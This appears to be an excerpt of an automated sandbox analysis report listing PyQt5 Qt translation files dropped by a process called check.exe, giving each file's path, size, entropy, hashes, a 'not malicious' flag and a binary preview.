SSDEEP:	3:j2wZC4n:CwZ
MD5:	BCEBCF42735C6849BDECBB77451021DD
SHA1:	4884FD9AF6890647B7AF1AEFA57F38CCA49AD899
SHA-256:	9959B510B15D18937848AD13007E30459D2E993C67E564BADBFC18F935695C85
SHA-512:	F951B511FFB1A6B94B1BCAE9DF26B41B2FF829560583D7C83E70279D1B5304BDE299B3679D863CAD6BB79D0BEDA524FC195B7F054ECF11D2090037526B451B78
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`...

C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\translations\qt_es.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	153
Entropy (8bit):	3.6070658648473097
Encrypted:	false
SSDEEP:	3:j2wZC4C/7lJFlAlHekSMthULlI+rwtbWlMvEJY1MUaEf8IPldkOzvt:CwElJ4+7MrURIRt6cujUaE8oi0F
MD5:	EE47DFADBA4414FDC051C5CFBE71DDC1
SHA1:	DE650E96A9C130D35F8A498202773EF7FC875D27
SHA-256:	E25E43F046F61022FFE871A2F73C6A12EDFC5C3EFD958C0E019A721860A053B0
SHA-512:	8C1D8901D2F66CCBF947B831858E08B703517470B2B813B241E00162A275AC9103FF5B9251AD39BD53551E0A4FB45EE74187B218A1EF7C6CF6C5FA9F9219AE04
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......es....v.....q.t.b.a.s.e._.e.s.....q.t.m.u.l.t.i.m.e.d.i.a._.e.s.....q.t.s.c.r.i.p.t._.e.s... .q.t.x.m.l.p.a.t.t.e.r.n.s._.e.s.......

C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\translations\qt_fa.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	293121
Entropy (8bit):	5.272179385890926
Encrypted:	false
SSDEEP:	3072:gEo2cQbzaVmvGQYkHkMRKkNeGr+0BhaRsLAChY21rpnLqL9ytnvC58gypn4l4qF:gEZbza0HjeGrxBhaCLFC
MD5:	F9C3624197ACB30A9E6CC799BB65BED6
SHA1:	D715EAE24387DE15588F68C92991A93FAFB5EEAB
SHA-256:	B292AFB0763B8C7C30A5AF7372BFC12D8A0D00BF3DD4A000715D9F576D9C1A39
SHA-512:	199C107AE7EAFCF2A5EEC149CAFEE7ED09B938E204B56AD3AAC9568D27166F61EC8E2225A11AF26F7E1F035FB5CAD98621A01E8A9942D18C273F43B90201162A
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......faB..I....*...u...+...............@.......A...J...B.......C...X...D.......E.......F...%...G.......H...0...I.......P...v...Q.......R.......S.......T..."...U.......V...h...W.......X...s...Y.......]..e....t...................-.......W.......\|.......i...;..Eu...;..Z....;...]...;..c....;.......;..0]...M..f....O.......O..2.......#....}..f=...m..fg.........(5......+;..1a..+;...V..+;...!..+O..17..+O...(..1.......E@......F....u..H4......HY...Y..H....S..I....5..I@.....IA......IC......J...1...J.......J.......J...\|...K...6...LD......L.......PS......R....Z..T.......Zr.. ...[`...O..[`......\...%@..\...2..._...&l.._...38..1........E..........2u..........1.......1...........@......4G...........................$...L...$..xY...[.......,...u...y...y...y..z.......F.......<.......g.......5W...........9...........f...E...U...E../....E..................0-...%..6....%.........................3......f..........5...?...0..EK...0......0..L ...0..c....0.......0...Z...5...........Y.. D

C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\translations\qt_fi.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	117
Entropy (8bit):	3.739162292019161
Encrypted:	false
SSDEEP:	3:j2wZC4C/4HlAlHekRgOp1MUZWJKlI+rwtbWlMsIkk:Cwxe++IUocIRt6Qkk
MD5:	72882942B07B8AAC98034016E752B1A0
SHA1:	BF23B4C136B863B10E770019A2DF62FC988859DF
SHA-256:	048CA42DCE4FAF5FC21D843576E3C6FD963146ECC78554E7E5F34D07F64FB213
SHA-512:	403E7F4E9A0E44F2118804F0781A18EB1852797825498751E3AFA02D9558D90293ABDB570786CED80F7EFF800BEF6D9444A72E6A640D331DA46B2A0EA43C8E96
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......fi....R.....q.t.b.a.s.e._.f.i.....q.t.s.c.r.i.p.t._.f.i.....q.t.m.u.l.t.i.m.e.d.i.a._.f.i.......

C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\translations\qt_fr.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	153
Entropy (8bit):	3.680458675741643
Encrypted:	false
SSDEEP:	3:j2wZC4C/FjlAlHekRL21MUZNJOLlI+rwtbWlMs9KIPldkORT:Cw3+SU0RIRt6koio
MD5:	3C45C665CFE036A7474CB4DCBB13CF40
SHA1:	62312DFF3C4CD38BAE8456C981601D0D89600F63
SHA-256:	8624033D849E670B12C9532337FCBF260F20848E044FEE7787CFE2AC92BE28DB
SHA-512:	21659AA452BC2493D915F0BE94F90CDD57759B1F1306AAA2836058D41E80DED24742EBD74E19420021514A6AB4150CA0B447574E96B9D3BF0BC5A8C78DAAF7AC
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......fr....v.....q.t.b.a.s.e._.f.r.....q.t.s.c.r.i.p.t._.f.r.....q.t.m.u.l.t.i.m.e.d.i.a._.f.r... .q.t.x.m.l.p.a.t.t.e.r.n.s._.f.r.......

C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\translations\qt_gd.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	70
Entropy (8bit):	4.463523104731333
Encrypted:	false
SSDEEP:	3:j2wZC4C/EXlAlHekQrEuknbJB:CwjO+5JY
MD5:	A8D55457C0413893F746D40B637F9C93
SHA1:	25123615482947772176E055E4A74043B2FBCAA0
SHA-256:	49DF855A004A17950338AF3146466F6DF4D5852410BD0B58EA80E0D0203A9D24
SHA-512:	99718B948D94B292BDEDF6B247A5856BC7AC78408FCC41C980F264C2C8565125786F0289F5F993DCF11B8CDA3AFB2A1D8634B1D0BC9B34992F538F8E4086EC00
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......gd..........q.t.b.a.s.e._.g.d....................

C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\translations\qt_gl.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	323590
Entropy (8bit):	4.568068046062524
Encrypted:	false
SSDEEP:	3072:OYSG8zxWSDjq73Pf6FT1f4uh50QGrRfFD54YyUY0Ou4/tnra3Z0uYhB5YHfHRRn2:O39WSD3TMQGrxFD5EUVQ
MD5:	0661FFABFBC50187F3BA38876B721946
SHA1:	EB5E7205355CFC6BCB4DF27E224079842C97B296
SHA-256:	204A01AC7DEB6B5BAE193AFECBD1E50D18C73BF7D94BADEB2BBFDF6123C4ED93
SHA-512:	65AB66CC54D65E7678FA731A5C5F2CC9D6FC217B91AD47D538440811E09A23E49CD95CE62A79E3E8C275E250AC1A0B54BD289F6DD067573876DA7AFF54381D02
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......gl_ESB..I...........+..&............@.......A...z...B.......C...p...D.......E......F...!...G......H.......I......P...@...Q.......R......S...5...T......U...+...V.......W...a...X.......Y...N...]..o....t..,................F.......p..............4....;..LI...;..bD...;.......;.......;.......;..cJ...M..o1...O..G....O..e.......U....}..oY...m..o........D..(5...X..+;..6/..+;...~..+;......+O..6...+O...N..1......E@...?..F.......H4..'...HY......H...3`..I......I@......IA......IC..0...J...P...J...1...J...0...J.......K...:...LD..2...L...3...PS..:A..R... d..T.......Zr..Rd..[`......[`.....\...WK..\...RR.._...X..._...f...1........E...{......7M..........1.......1....q......O.......9......................)....$... ...$.......[..,=...,..-....y..0X...y...~......Mx......]0.......H......:A......0....9...............E...o...E..b....E.........1.......c....%..;....%...;......3.......^......S................5..4Z...0..L....0.......0..n....0.......0..7....0.......5..9D......!g.

C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\translations\qt_he.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	83
Entropy (8bit):	3.880645689209568
Encrypted:	false
SSDEEP:	3:j2wZC4C/YJ/dQlHekfaB21MUXmlvt:CwT0+D/UUt
MD5:	DD5C2C6B148F2DB3E666B859776AE129
SHA1:	8368F32039CC0776A1B95C9DED5FE6C9EA0D93FD
SHA-256:	C113D14E218D5402B616DABEA27969C6F83852676468C5EF051DDDEFB3EE0235
SHA-512:	2EAE33C8707407E083F6B8B05EA2C5B987646DF1553888C16D6508C5A33B2F758DDED73323622CD50324C96F51D61B7CE822F393551A30B211ABD3CC1367249F
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......he....0.....q.t.b.a.s.e._.h.e.....q.t.s.c.r.i.p.t._.h.e.......

C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\translations\qt_help_ar.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	8743
Entropy (8bit):	5.189558605179696
Encrypted:	false
SSDEEP:	192:YUM7gBwnG4Vxj4nyn9aAMOJckrL6esm/0sQ5HeK1nvEB:YBkKnZxkyn9aAMWPsm/0sQsGvEB
MD5:	CCD39A7C8139AD041E31B3E5D40968B4
SHA1:	5751BE96817BB6AE7C9DA9F1FBA7F42F31CFCC5D
SHA-256:	222088C9752D1CC3BAB985EF2DC77E5AE78578DCE18A61EC15B39F02E588163D
SHA-512:	9844C0EC65EE1C76DBA021EAC6D476A85E6C8F5BBAF4150C1EA80C0A95BEDE67B5E8F981360EF8599FCECDFCBCB83BC0B8AC44DDEFDCD85F914318030E346967
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......arB.....(.....d.0T.....5w......Uj....!.`.....M.a[............n..t..............39....&................B<s...V..M^...e......4.O5^...r..)^......o>...........?...t.....D ......k.N.....k.N...C...n...T...I...R..........2>.................\|..G.......w....T.......l..........,................^............$a......6.>...........x..K......W.b....._Xn......GN...m..~......!.....J.K.H.............pN.............P.~.....o.....W..(.......~......s.>......%c.....o.....R.z.q..........................n.h................e.....i..........:.J.1. .E.3.E.Q.I..........Untitled.....QHelp.....8..9.0.Q.1. .F.3... .E.D.A.Q. .'.D..Q.,.E.J.9.).:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler........9.0.Q.1. .%.F.4.'.!. .'.D./.Q.D.J.D.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....>..9.0.Q.1. .%.F.4.'.!. .,./.'.H.D. .A.J. .'.D.E.D.A.Q. .%.1........... Cannot create tables in file %1......QHelpCollectionHandler.....L..9.0.Q.1. .*.

C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\translations\qt_help_bg.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	10599
Entropy (8bit):	5.192287379770591
Encrypted:	false
SSDEEP:	192:jhYkcd7CYBdmfIOeX3byuJRoZXlBYnEpUYR+BJqO5X9pA2NNrxC0zwRK2nMY762A:a71DQIrLuVCnEtR+DquhN5xC0zwKPYHA
MD5:	5538049DA3A1D1D724AB6E11D2E2EDBE
SHA1:	7256BE390B88A053C0252488C443BE42F6F2D92A
SHA-256:	CBCDD1E0BBAE332D80DDB0A286056F17C824FA28D353D7FDF12FC97D9F6FE054
SHA-512:	DD98CAF3A016968EEDC9106C1839DDECC2D109E9E354708BD74B35E766C6A098C1680C0B867EAD9FCE2E2A6D683BE673B8E5DF1A1B2F1AAFDB31910FF833370F
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......bgB...(.(.......0T......5w... S.Uj......`.......a[....(..........t..............39..........&..........B<s...4..M^..........q...J..%..O5^...O..)^...I..o>...I...J..%.......#....t...A.8dz..$..D ....Z.k.N...<.k.N.......n.......I..............2>...p................G..."...w....................7..,................^............$a....<.6.>..........#...K...........$1.W.b....._Xn......GN...*..~....-..TH.."..!.....5.K.H..#R.........pN..."......&..P.~...@.o.....v..(.........."8..~......s.>.....o.... ..z.q..........................O.h....!t..........e....mi..'.....\|.(...@.8.G.8.=.0.B.0. .<.>.6.5. .4.0. .5.,. .G.5. .4.>.:.C.<.5.=.B.0.F.8.O.B.0. .2.A.5. .>.I.5. .A.5. .8.=.4.5.:.A.8.@.0...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.........0.1.5.;.5.6.:.0.:..........Note:.....QCLuceneResultWidget.....,. .5.7.C.;.B.0.B.8. .>.B. .B.J.@.A.5.=.5.B.>..........Search Results.....QCLuceneResultWidget....... .

C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\translations\qt_help_ca.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	7444
Entropy (8bit):	4.580794980254807
Encrypted:	false
SSDEEP:	192:G8oS34B7n303D37Bn3Jso37cfp3Mg3H373R58noct36R9RFu:GQU7ETrxZvqTXLSoct36Pzu
MD5:	66722ED97BCBFD3DAE3C8264413859AB
SHA1:	400A93B213FCF9BBC9785881EA82ADB9F444CD6C
SHA-256:	ECD4283A660F2CF72849B323810D7EADD063120B6F561E05AA1243A5B280946A
SHA-512:	B898BAC9652D7532384ED5CC53FA62DB55D516421D13F815A3E6D5E80AD4C69555F1A7E6C51F8B0A234614824EEE01D6731458F90D40A585990F84A58B9ABE44
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......caB............%.......0T......K:^.....Uj......`.....P..YJ...V.E.4...*...........>...7........B<s.....B\>...6........+.s.....zq.......9.......vR......@.......@.......:....;.8Z....!.g.N......F................t.....D ....z.k.N.......I......^......`#.......2.......G........N...7......N......{..................K...............GN......NO...5.........K.H...@.........pN......V............q..................>...N.........~.....5..%c...:.z.q....i...4....".A.f.e.g.e.i.x. .u.n. .f.i.l.t.r.e..........Add Filter.....FilterNameDialogClass.......N.o.m. .d.e.l. .f.i.l.t.r.e.:..........Filter Name:.....FilterNameDialogClass.......S.e.n.s.e. .t...t.o.l..........Untitled.....QHelp.....`.N.o. .s.'.h.a. .p.o.g.u.t. .c.o.p.i.a.r. .e.l. .f.i.t.x.e.r. .d.e. .c.o.l...l.e.c.c.i...:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....H.N.o. .s.'.h.a. .p.o.g.u.t. .c.r.e.a.r. .e.l. .d.i.r.e.c.t.o.r.i.:. .%.1..........Cannot create directory: %1.....QHelpCollect

C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\translations\qt_help_cs.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	15297
Entropy (8bit):	4.708378368926237
Encrypted:	false
SSDEEP:	384:hmv1gdEYEiNrVhTBvAn1ca1f5lwHoJr0vwuxqsP/5jxA:o1gdEvgbloCof9ixqspW
MD5:	ED228F0F60AE9AEC28AB9171D5AE9590
SHA1:	7F061CF0C699D125A5531E3480C21964452F45EA
SHA-256:	4AC56FC63E400943BAB13F1D4C418502138908E1D488C24AEE6131D3D17552AA
SHA-512:	794CC671C08BFC50980820A6389B9D0D3514619AD0A8F18EFD5554CBBF2482192DF00B9D3B05FEE45F42276E63E2375FB28E193930D426245035B4B0E3E14ED8
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......cs_CZB...H.(.......(.......0T......0T......5w...0..Uj......`.......a[......a[....$.......p..........t.......t...........!..1"....T.39....T.39.......s...0......(......7/.................B<s...L..MQ......M^../q..........J..6@.0....B.O5Q..'..O5^..(A..)Q...X..)^......o>..........+....J..6.......4....t.....8dz..5..D ....R.D ......k.A.....k.A.....k.N.....k.N.......n.."....I..........................2...21......2>..........d.............T..G...4...w...!N......&O......&....!..".......#E..,...,.......)....Q..$/...^..$................$a......6.>.. t......5...K.......K....)......5E.W.b..-.._Xa..%a._Xn..%...GA......GN...?......,9..~.......TH..3..!......K.H..4h.........pA...J..pN..........7..P.~.. ..o.....0..(....*..(..........3V..~....T.s.1.....s.>..._.o....0..o....1p.z.q..........'9.....#........^.........h....2................Z..e... .i..8J......(.D.o.v.o.d.e.m. .p.r.o. .t.o. .b.y. .m.o.h.l.o. .b...t.,. .~.e. .d.o.k.u.m.e.n.t.a.c.e. .j.e. .s.t...l.e. .j.e.a.t...

C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\translations\qt_help_da.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	4795
Entropy (8bit):	4.530246422531362
Encrypted:	false
SSDEEP:	96:X82wNlnKfN1LMFy7LsF3ZqBFZjWo0koBLqBXXjGL0qU7UqB7zoElmP5MUu4DZIHU:XM01f7eOnoB8X2s7Vfg5Mi4beXiOUu
MD5:	1D09BEE1FB55A173F7EB39B9A662A170
SHA1:	C77F0A148262A91679F19689E4790B754D45D5D5
SHA-256:	6BB092552A398687119F6D52145F04BF8373977446D8F00C0DCBD56B96829F0F
SHA-512:	BE5A31A6135E8DB024A8B0EB20C4D8EECBF76861F83FF83B4CA97327DB74AD94BB5D77B4E0A59A33B697C32A4EACD61B8C878951F2C545385C74D99FCE56FEE1
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......daB.....%.....m.0T......Uj....V.`....................k.B<s.....B\>..........6.+.s...............t.....D ....\|.k.N...9...I...O..2.......G....B...N...O..............!..K...._..........GN...........@.K.H.............pN..............>.....~.....m..%c.....z.q....i..........U.n.a.v.n.g.i.v.e.t..........Untitled.....QHelp.....D.K.a.n. .i.k.k.e. .k.o.p.i.e.r.e. .s.a.m.l.i.n.g.s.f.i.l.e.n.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....6.K.a.n. .i.k.k.e. .o.p.r.e.t.t.e. .m.a.p.p.e.n.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....V.K.a.n. .i.k.k.e. .o.p.r.e.t.t.e. .i.n.d.e.k.s.t.a.b.e.l.l.e.r. .i. .f.i.l.e.n. .%.1...........&Cannot create index tables in file %1......QHelpCollectionHandler.....J.K.a.n. .i.k.k.e. .o.p.r.e.t.t.e. .t.a.b.e.l.l.e.r. .i. .f.i.l.e.n. .%.1........... Cannot create tables in file %1......QHelpCollectionHandler.....P.K.a.n. .i.k.k.e. .i.n.d.l...s.e. .s.q.l.i.t.e.-.d.a.t.a.b.a.s.e.-.d.r

C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\translations\qt_help_de.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	7570
Entropy (8bit):	4.550982634910665
Encrypted:	false
SSDEEP:	96:8y/gPmmhL/7LlSivP6kBL7jb0RNUzzpld4UGG3Ik18fLP0L7fGc0OeVP8a8hiAwj:1OD7hx/Bv3oNuFX4iqgv34fZsu
MD5:	3B070D169E3381E2FB081172934AAD00
SHA1:	70886EB7EF566B296D0814BD4C2440AC176699D6
SHA-256:	9962523FBAE9F1E4C3B5C3C16860D059291CB30DC5EBE5A5EDA4C836A03FED1E
SHA-512:	271B730B5A7358E923BBBC6FA074A72DA52FA47E3B7726779EF7034200EDA09BF0E1AE4E7B11B59F76805F48DC285F6EFC245EB9C7F4A748BE82B25CEE1DDCAE
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......deB..........B.%.....5.0T......K:^.....Uj....?.`.....f..YJ...V.E.4...............>............B<s...z.B\>...\........+.s...Q.zq....C..9....4..vR...B..@.......@.......:......8Z......g.N......F....>...........t.....D ......k.N.......I......^....\|.`#....I..2....<..G....^...N.........................;..........K....y..........GN......NO...........,.K.H.............pN......V...................."..........>.............~........%c.....z.q....i........".F.i.l.t.e.r. .h.i.n.z.u.f...g.e.n..........Add Filter.....FilterNameDialogClass.....".N.a.m.e. .d.e.s. .F.i.l.t.e.r.s.:..........Filter Name:.....FilterNameDialogClass.......O.h.n.e. .T.i.t.e.l..........Untitled.....QHelp.....\.D.i.e. .K.a.t.a.l.o.g.d.a.t.e.i. .k.a.n.n. .n.i.c.h.t. .k.o.p.i.e.r.t. .w.e.r.d.e.n.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....\.D.a.s. .V.e.r.z.e.i.c.h.n.i.s. .k.a.n.n. .n.i.c.h.t. .a.n.g.e.l.e.g.t. .w.e.r.d.e.n.:. .%.1..........Cannot create directory: %

C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\translations\qt_help_en.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	16
Entropy (8bit):	4.0
Encrypted:	false
SSDEEP:	3:j2wZC4n:CwZ
MD5:	BCEBCF42735C6849BDECBB77451021DD
SHA1:	4884FD9AF6890647B7AF1AEFA57F38CCA49AD899
SHA-256:	9959B510B15D18937848AD13007E30459D2E993C67E564BADBFC18F935695C85
SHA-512:	F951B511FFB1A6B94B1BCAE9DF26B41B2FF829560583D7C83E70279D1B5304BDE299B3679D863CAD6BB79D0BEDA524FC195B7F054ECF11D2090037526B451B78
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`...

C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\translations\qt_help_es.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	10704
Entropy (8bit):	4.481291573289571
Encrypted:	false
SSDEEP:	192:q9J9j7e4BQhD0h61nnKz+DJF/45ojDU9V1Wa/rmtIBMH:Wp64ShDnnKz+FhjQpWa/ytoMH
MD5:	9EDF433AB9EE5FC7CF7782370150B26A
SHA1:	A918AE15A0DF187C7789BE8599A80E279F039964
SHA-256:	FD16B279F8CF69077F75E94D90C9C07A2AFFF3948A579E3789F5FFB5E5F4202D
SHA-512:	88245F6FBAAF603A03D7EA2341411AE040791D47C9FF110C6D6CDD8165F0A8BA7A4A0DA5CD543BBE95A4E93FE3A81E95B3664E00C11791FBCB4923E3A80ABC60
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......es_ESB...(.(.....7.0T..../.5w... C.Uj......`.......a[....0..........t..............39..........&e.........B<s...D..M^..............J..%p.O5^...I..)^...1..o>.......J..%.......#....t.....8dz..$..D ......k.N.....k.N.......n.......I..............2>....................G...#...w............!.......%..,................^............$a......6.>..........#...K...........$C.W.b....._Xn......GN...\|..~.......TH.."..!.....5.K.H..#f.........pN...j......'..P.~... .o........(....>....."<..~....c.s.>.....o.... ..z.q..........................u.h....!p.......*..e....Qi..'}......(.L.a. .r.a.z...n. .d.e. .e.s.t.o. .p.u.e.d.e. .s.e.r. .q.u.e. .l.a. .d.o.c.u.m.e.n.t.a.c.i...n. .a...n. .e.s.t... .s.i.e.n.d.o. .i.n.d.e.x.a.d.a...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.a.:..........Note:.....QCLuceneResultWidget.....2.R.e.s.u.l.t.a.d.o.s. .d.e. .l.a. .B...s.q.u.e.d.a..........Search Results.....QCLu

C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\translations\qt_help_fr.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	10922
Entropy (8bit):	4.459946393010639
Encrypted:	false
SSDEEP:	192:w4BIn67/WsmoB3r6M/eYlSbyE7DnvE7pcn9nPJZe7nOFovzcNn7Uhmio+2/p53I/:w4N19fq3n2c9Bucuhmi52/X3Qpam
MD5:	D520C7F85CC06C66715A2B6622BF0687
SHA1:	47292D068172FBC9DC0D9BE2F479E890A37CE138
SHA-256:	687E351C062F688AAFF6CF05218D6017B80B1A1B4238D1D30250A55EE41C5FED
SHA-512:	736B50BB64751B127300BCAFE88888A9D9A2081CBF934EDCFFEF6CEF0575505AFDF714273A97671ABB598AE3D23C8E55F7DCD632FB0AA219ED5F763768576E04
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......fr_FRB...(.(.....y.0T....K.5w...!1.Uj....*.`.......a[............5..t..............39....m.....'W.......S.B<s...d..M^.. ...........J..&`.O5^...+..)^......o>.......J..&.......$....t.....8dz..%..D ......k.N.....k.N...D...n.......I...........c..2>..........M.........G...$...w....K..................,................^............$a......6.>...c......$...K....'......%M.W.b....._Xn...j..GN......~.......TH..#..!.......K.H..$Z......,..pN..........'..P.~.....o........(....h.....#4..~......s.>...M.o....!..z.q...........p......L.........h...."^.......b..e.....i..(W......(.I.l. .e.s.t. .p.o.s.s.i.b.l.e. .q.u.e. .c.e.l.a. .s.o.i.t. .d... .a.u. .f.a.i.t. .q.u.e. .l.a. .d.o.c.u.m.e.n.t.a.t.i.o.n. .e.s.t. .e.n. .c.o.u.r.s. .d.'.i.n.d.e.x.a.t.i.o.n...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.e. .:..........Note:.....QCLuceneResultWidget.....2.R...s.u.l.t.a.t.s. .d.e. .l.a. .r.e.c.h.e.r.c.h.e.

C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\translations\qt_help_gl.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	10891
Entropy (8bit):	4.5087667371046205
Encrypted:	false
SSDEEP:	192:Im7gBZHx4hCTNarW6EJDvoIR765f40wqNcMi/8F/Ihon:v0fHccarW6Eh61wqNcMi/Q/won
MD5:	B62C74793741FC386332A59113E8D412
SHA1:	589CE099F2C1D92581B5CF0E17BE49A2BF0014D4
SHA-256:	7399A248609974773F60866C87B78EA7DFBC4F750313D692F7886CD763883C9F
SHA-512:	D8E1A3B3732662BA572A1387651F2625742710834BEDB41809DA47B5D23020AA1B558B64A00C10C605D1844F0544483163F4A6227CAFFA5ECDABF3BBF4E12D9B
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......gl_ESB...8.(.......0T......Uj......`.....`.a[....F..........t..............1"... S.39.......s...!.............'F.........B<s...8..MQ.. ...........J..&S.0.....x.O5Q......)Q...O..o>...{.......#...J..&.......$....t.....8dz..%..D ......k.A.....k.A.......n.......I.................."...21....................G...#...w............[...!...?...........Q...?........$a....v.6.>..........$...K...........%0._Xa......GA...n..........~.......TH..#..K.H..$M.........pA...Z......'..P.~...B.o........(..........#+..~......s.1.....o....!..z.q...e.............................. ..e....wi..((......(.A. .r.a.z...n. .d.i.s.t.o. .p.o.d.e. .s.e.r. .q.u.e. .a. .d.o.c.u.m.e.n.t.a.c.i...n. .a...n.d.a. .e.s.t.e.a. .a. .i.n.d.e.x.a.r.s.e...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.a.:..........Note:.....QCLuceneResultWidget.....*.R.e.s.u.l.t.a.d.o.s. .d.a. .p.r.o.c.u.r.a..........Search Results.....QCLucene

C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\translations\qt_help_hu.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	10284
Entropy (8bit):	4.674501432335502
Encrypted:	false
SSDEEP:	192:RNY+rCG3e7LBqYqYseBb/FEWBgSn62TdJgDO9esYGY3DtgGh621XlZ/8kWvIMK:4+rheHYYZdBb/pgSn62T/FeVD3DGGh62
MD5:	5A56E9E2ED6ECE3F249D1C2A7EB3B172
SHA1:	D6F079F40FBB813B0293C1D2210BAE7084092FEC
SHA-256:	70F33B569C2942F41C6D634EA6A61CB8D80EB2C7011BAD48EF6DBAE9677960D5
SHA-512:	28947128FC51791CFDBFD3958FAF9B33979DB52C90AE0159EDB01FE6032284EB37BC05187162983A0435560BCEA864B008F499CDB4CE662792599FE20A37972A
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......hu_HUB...(.(.......0T......5w......Uj......`.....4.a[....N..........t....".........39..........%..........B<s...8..M^...8..........J..$..O5^......)^...]..o>.......J..$......."N...t.....8dz..#g.D ......k.N...>.k.N.......n.......I..............2>..........a.........G...!...w.......................,................^............$a......6.>.........."...K....m......"..W.b...l._Xn...~..GN......~.......TH..!F.!.......K.H..!..........pN..........%..P.~...<.o........(.......... ...~......s.>...{.o.....c.z.q...K.......v......l.........h.... ........t..e....mi..%.....~.(.E.z. .a.m.i.a.t.t. .l.e.h.e.t.,. .h.o.g.y. .a. .d.o.k.u.m.e.n.t...c.i... .m...g. .i.n.d.e.x.e.l...s. .a.l.a.t.t. .v.a.n...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......M.e.g.j.e.g.y.z...s.:..........Note:.....QCLuceneResultWidget.....&.K.e.r.e.s...s.i. .e.r.e.d.m...n.y.e.k..........Search Results.....QCLuceneResultWidget.......A

C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\translations\qt_help_it.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
